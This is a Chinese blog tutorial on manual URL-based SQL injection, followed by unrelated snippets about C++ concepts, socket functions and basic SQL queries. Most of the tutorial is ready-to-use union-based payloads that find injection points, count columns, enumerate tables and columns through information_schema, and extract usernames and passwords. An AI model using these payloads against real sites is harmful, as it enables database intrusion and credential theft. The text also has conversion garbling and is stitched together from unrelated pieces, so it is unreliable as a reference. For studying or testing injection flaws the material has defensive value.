最最基本的SQL手動url注入方法

2021-09-26 23:18:08 字數 1215 閱讀 3194

sql注入,說白了本質就是乙個應用sql語句構造程式的乙個過程,通過在web中輸入**使後台認為其是資料便注入原始碼之中,從而達到某些意想不到的結果

手工查詢注入點:

1. 1    #正常訪問

2. 1' and 1=1; # 是不是跟正常結果一樣

3. 1' and 1=2; # 是不是沒有結果

4. 1' order by 1,2; # 猜列數

5. 1' and 1=2 union all select 1, 2; # 檢視是否可以使用union all

6. 1' and 1=2 union all select 1, database(); #  獲取當前資料庫

7. 1' and 1=2 union all select table_schema, table_name from 

其下闡述一點基本的sql注入原理和基本的注入步驟

1.尋找注入點,構造閉合直接在網頁的位址口進行手工注入  url?id=1 所猜閉合 1=2 --+

若web報錯,及無執行該語句,猜錯;反正web崩潰及執行該語句,猜對      常見閉合 (  )    「 」     ' '   [ ]      或者直接無閉合   

2.檢視當前表總共有多少列 url?id=1 order by 所猜測的數字 --+

2.尋找顯示位 url?id=-1』 union all select 1,2,3 --+

3.定位該網頁所選用資料庫 database()當前資料庫  version() 資料庫版本號

4.通過資料庫查詢web所用表  url?id=-1』 union all select 1,table_name,3 from information_schema.tables where table_schema=』當前資料庫』 --+

5.通過已知資料庫和表名查詢該錶內所有列名 url?id=-1』 union all select 1,column_name,3 from information_schema.columns where table_schema=』當前資料庫』 and table_name=』當前表名』 --+

6.最後乙隻資料庫,表名,列名後,直接查詢資料庫中的使用者名稱和密碼  

url?id=-1 union all select 1,使用者名稱,密碼 from 表名

ps:若顯示內容過少可呼叫函式group_concat(要查詢內容)   即可將行與列互換顯示

--+  是#注釋符的url轉碼

關於C 一些最最最基本的概念的理解

物件 c 術語 就是一塊記憶體空間,兩個維度來描述一塊記憶體空間 位址 內容。變數則是乙個有名字的物件 c 術語 型別 規定了如何解釋該型別物件 c 術語 的那一塊記憶體空間,以及在這塊記憶體空間上能夠實施的操作。表示式 由運算子 函式 與運算物件 1 構成,共同表達了乙個計算過程。其中 運算子表達...

最最基本的socket程式設計基礎 c 二

這一篇我來寫一下socket程式設計裡面比較基本的函式 socket socket int af,int type,int protocl 第二個引數指定socket型別 socke stream產生流式套接字,sock dgram產生資料報套接字 函式呼叫失敗返回invalid socket 我有...

SQL最基本的語句

select empno,ename,sal 月薪,comm as 獎金 deptno as 部門,sal 12 as 年薪,sal 12 comm,sal 12 nvl comm,0 from emp select from emp where comm is null null表示此字串是用來填...